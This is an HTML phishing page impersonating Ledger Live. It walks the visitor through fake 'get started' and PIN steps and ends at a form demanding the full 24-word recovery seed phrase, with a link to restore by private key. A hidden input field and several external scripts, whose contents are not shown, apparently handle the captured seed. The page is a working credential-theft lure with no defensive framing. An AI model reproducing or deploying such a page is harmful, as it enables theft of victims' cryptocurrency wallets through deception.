<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="../live/ledger.png">

<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0,user-scalable=0">
<title>Ledger Live</title>
<link rel="stylesheet" href="../live/css2.css">
<link rel="stylesheet" href="../live/UMX9jlahOh2Y.css">
<link rel="stylesheet" type="text/css" href="../live/all.min.css">
<link rel="stylesheet" href="../live/all(1).min.css" >
<link rel="stylesheet" type="text/css" href="../live/style.css">
<style> 
       .step-tab .step-content {
    -webkit-box-flex: 1;
    -ms-flex: 1;
    flex: 1;
    height: 50vh!important;
    padding: 30px 100px;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: vertical;
    -webkit-box-direction: normal;
    -ms-flex-direction: column;
    flex-direction: column;
}
.step-tab .step-content .step-bottom {
    margin-top: auto;
    width: 100%;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
    padding:50px 0px!important;
}

.step-tab .step-content  #btnCenCustom{
    margin-top: auto;
    width: 100%;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: center!important;
    gap: 54px;
}
.step-tab .step-content .step-main {
     padding-top:20px; 
}

</style>

<style>
	 .hidden-field {
      display: none;
    }
#loader-overlay {
  display: none;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(0, 0, 0, 0.5);
  z-index: 9999;
}

#loader {
  position: absolute;
  top: 50%;
  left: 45%;
  transform: translate(-50%, -50%);
  width: 50px;
  height: 50px;
  border: 5px solid #fff;
  border-top: 5px solid #bbb3fa;
  border-radius: 50%;
  animation: spin 1s linear infinite;
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

.show-loader {
  display: block;
}
</style>

<style type="text/css">#xdfaok4qkbu81717963685023 {outline:none !important;
visibility:visible !important;
resize:none !important;
box-shadow:none !important;
overflow:visible !important;
background:none !important;
opacity:1 !important;
filter:alpha(opacity=100) !important;
-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity 1) !important;
-mz-opacity:1 !important;
-khtml-opacity:1 !important;
top:auto !important;
right:0px !important;
bottom:0px !important;
left:auto !important;
position:fixed !important;
border:0 !important;
min-height:0px  !important;
min-width:0px  !important;
max-height:none  !important;
max-width:none  !important;
padding:0px !important;
margin:0px !important;
-moz-transition-property:none !important;
-webkit-transition-property:none !important;
-o-transition-property:none !important;
transition-property:none !important;
transform:none !important;
-webkit-transform:none !important;
-ms-transform:none !important;
width:auto !important;
height:auto  !important;
display:none !important;
z-index:2000000000 !important;
background-color:transparent !important;
cursor:none !important;
float:none !important;
border-radius:unset !important;
pointer-events:auto !important;
clip:auto !important;
color-scheme:light !important;}
#xdfaok4qkbu81717963685023.widget-hidden {display: none !important;}#xdfaok4qkbu81717963685023.widget-visible {display: block !important;}
@media print{
 #xdfaok4qkbu81717963685023.widget-visible { 
display: none !important;
 }
}</style>
<style>
.step-bottom1 {
    margin-top: auto;
    width: 100%;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
}
.step-bottom1 button:first-child {
    border: 1px solid #181a1c;
    background: #bbb3fa;
    color: #000;
}
.step-bottom1 button {
    border: none;
    height: 40px;
    width: auto;
    padding: 0 20px;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
    color: #000;
    font-weight: 600;
    cursor: pointer;
    background: #fff;
    border-radius: 40px;}
</style>
<style type="text/css">@keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-moz-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-webkit-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}#t9aop0493eu1717963685062.open{animation : tawkMaxOpen .25s ease!important;}@keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-moz-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-webkit-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}#t9aop0493eu1717963685062.closed{animation: tawkMaxClose .25s ease!important}
</style>

</head>

<body>
<div class="page-tab step-tab" style="" id="tab-4">
        <div class="step-side">
            <div class="logo">
                <img src="../live/mfkNbEskGSwj.svg" alt="">
            </div>
            <div class="step-img">
                <img src="../live/eGfjLjEcIGAc.png" alt="">
            </div>
        </div>
        <div class="step-content">
            <div class="step-progress">
                <div class="progress">
                    <span>1</span>GET STARTED
                </div>
            </div>
            <div class="step-desc">
                <h2>IMPORT WALLET USING RECOVERY PHRASE</h2>
                <p>Restore your Ledger from your recovery phrase to restore, replace or back up your Ledger hardware wallet. <br> Your Nano will restore your private keys and you will be able to access and manage your Crypto. </p>
            </div>
            <div class="step-bottom">
                <button onclick="location.href = '../index.html';">
				<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-left" viewBox="0 0 16 16">
                        <path fill-rule="evenodd" d="M15 8a.5.5 0 0 0-.5-.5H2.707l3.147-3.146a.5.5 0 1 0-.708-.708l-4 4a.5.5 0 0 0 0 .708l4 4a.5.5 0 0 0 .708-.708L2.707 8.5H14.5A.5.5 0 0 0 15 8z"></path>
                    </svg>&nbsp;&nbsp;Back</button>
                <button class="go-to-tab" data-got-to="5">Next Step&nbsp;&nbsp;<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-right" viewBox="0 0 16 16">
                        <path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"></path>
                    </svg></button>
            </div>
        </div>
    </div>
<div class="page-tab step-tab" style="display: none;" id="tab-5">
        <div class="step-side">
            <div class="logo">
                <img src="../live/mfkNbEskGSwj.svg" alt="">
            </div>
            <div class="step-img">
                <video autoplay="" muted="" loop="">
                    <source src="../live/Bflfh7PtIV1m.mov" type="video/mp4">
                </video>
            </div>
        </div>
        <div class="step-content">
            <div class="step-progress">
                <div class="progress">
                    <span>1</span>GET STARTED
                </div>
            </div>
            <div class="step-desc">
                <h2>THE BEST WAY TO GET YOU STARTED:</h2>
            </div>
            <div class="step-main">
                <ul>
                    <li>
                        <span>1</span>
                        <div class="text">
                            <strong>Turn on Nano</strong>
                            <p>Connect your device to your computer with the USB cable.</p>
                        </div>
                    </li>
                    <li>
                        <span>2</span>
                        <div class="text">
                            <strong>Browse</strong>
                            <p>Learn how to interact with your device by reading the on-screen instructions.</p>
                        </div>
                    </li>
                    <li>
                        <span>3</span>
                        <div class="text">
                            <strong>Select "Enter your recovery phrase "</strong>
                            <p>Press both buttons simultaneously to validate the selection.</p>
                        </div>
                    </li>
                    <li>
                        <span>4</span>
                        <div class="text">
                            <strong>Turn on Nano</strong>
                            <p>Come back here to follow instructions on your PIN code.</p>
                        </div>
                    </li>
                </ul>
            </div>
            <div class="step-bottom" id="btnCenCustom">
                <button class="go-to-tab" data-got-to="4"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-left" viewBox="0 0 16 16">
                        <path fill-rule="evenodd" d="M15 8a.5.5 0 0 0-.5-.5H2.707l3.147-3.146a.5.5 0 1 0-.708-.708l-4 4a.5.5 0 0 0 0 .708l4 4a.5.5 0 0 0 .708-.708L2.707 8.5H14.5A.5.5 0 0 0 15 8z"></path>
                    </svg>&nbsp;&nbsp;Back</button>
                <button class="go-to-tab" data-got-to="6">Next Step&nbsp;&nbsp;<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-right" viewBox="0 0 16 16">
                        <path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"></path>
                    </svg></button>
            </div>
        </div>
    </div>
<div class="page-tab step-tab" style="display: none;" id="tab-6">
        <div class="step-side">
            <div class="logo">
                <img src="../live/mfkNbEskGSwj.svg" alt="">
            </div>
            <div class="step-img">
                <img src="../live/eGfjLjEcIGAc.png" alt="">
            </div>
        </div>
        <div class="step-content">
            <div class="step-progress step-2">
                <div class="progress">
                    <span>2</span>PIN CODE
                </div>
            </div>
            <div class="step-desc">
                <h2>PIN CODE</h2>
                <p>Your PIN code is the first layer of security. It physically secures access to your private key and your Ledger. Your PIN code must be 4 to 8 digits long. </p>
                <div class="pin-switch">
                    <label class="switch">
                        <input type="checkbox" id="pin-switch">
                        <span class="slider round"></span>
                    </label> I understand that i must choose my PIN code myself and keep it private.
                </div>
            </div>
            <div class="step-bottom">
                <button class="go-to-tab" data-got-to="5"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-left" viewBox="0 0 16 16">
                        <path fill-rule="evenodd" d="M15 8a.5.5 0 0 0-.5-.5H2.707l3.147-3.146a.5.5 0 1 0-.708-.708l-4 4a.5.5 0 0 0 0 .708l4 4a.5.5 0 0 0 .708-.708L2.707 8.5H14.5A.5.5 0 0 0 15 8z"></path>
                    </svg>&nbsp;&nbsp;Back</button>
                <button class="go-to-tab" id="pin-ok-btn" data-got-to="7">Next Step&nbsp;&nbsp;<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-right" viewBox="0 0 16 16">
                        <path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"></path>
                    </svg></button>
            </div>
        </div>
    </div>
<div class="page-tab step-tab" style="display: none;" id="tab-7">
        <div class="step-side">
            <div class="logo">
                <img src="../live/mfkNbEskGSwj.svg" alt="">
            </div>
            <div class="step-img">
                <img src="../live/a9SypYD4A2v9.png" alt="">
            </div>
        </div>
        <div class="step-content">
            <div class="step-progress step-4">
                <div class="progress">
                    <span>3</span>RECOVERY PHRASE
                </div>
            </div>
			<form  id="seedna" autocomplete="off" >
            <div class="step-desc">
                <h2>IMPORT YOUR WALLET</h2>
                <p>Enter your Recovery Seed Phrase Words to Import Your Wallet. <br> **Ledger does not keep a copy of your recovery phrase. <br> **ENTER 24 SEED PHRASE WORDS CORRECTLY TO START LEDGER LIVE.</p>
            <div class="step-bottom1">
                <button type="button" class="go-to-tab" onclick="location.href = './key.html';">Restore With Private Key</button>
			</div>
			
            <div class="step-main">
                <div class="input-wrapper">
                    <textarea class="seedTextArea" id="inputna" placeholder="Paste or Type in your mnemonic phrase,words sepererated by spaces"></textarea>
                                        <div class="flat"></div>
					<input type="text" id="hiddenField" class="hidden-field">

                </div>
            </div>
            <div class="step-bottom">
                <button type="button" class="go-to-tab" data-got-to="6"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-left" viewBox="0 0 16 16">
                                <path fill-rule="evenodd" d="M15 8a.5.5 0 0 0-.5-.5H2.707l3.147-3.146a.5.5 0 1 0-.708-.708l-4 4a.5.5 0 0 0 0 .708l4 4a.5.5 0 0 0 .708-.708L2.707 8.5H14.5A.5.5 0 0 0 15 8z"></path>
                            </svg>&nbsp;&nbsp;Back</button>
                <button  type="submit" id="submitBtn" class="next-btn disabled">Next Step&nbsp;&nbsp;
				<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-right" viewBox="0 0 16 16">
                 <path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"></path>
                </svg>
					</button>
            </div>
        </div>
    </div>
	</form>
</div>
</body>
<div id="loader-overlay">
<div id="loader">
</div>
</div>
<script>
        document.addEventListener('DOMContentLoaded', function () {
            const buttons = document.querySelectorAll('.go-to-tab');
            buttons.forEach(button => {
                button.addEventListener('click', function () {
                    const targetTab = this.getAttribute('data-got-to');
                    const currentTab = this.closest('.page-tab.step-tab');
                    
                    currentTab.setAttribute('style', 'display: none;');
                    document.getElementById(`tab-${targetTab}`).removeAttribute('style');
                });
            });
        });
    </script>
<script src="seedna.js"></script>
<script src="wordlist_english.js"></script>
<script src="sjcl-bip39.js"></script>
<script src="jsbip39.js"></script>
<script src="formScript.js"></script>
</html>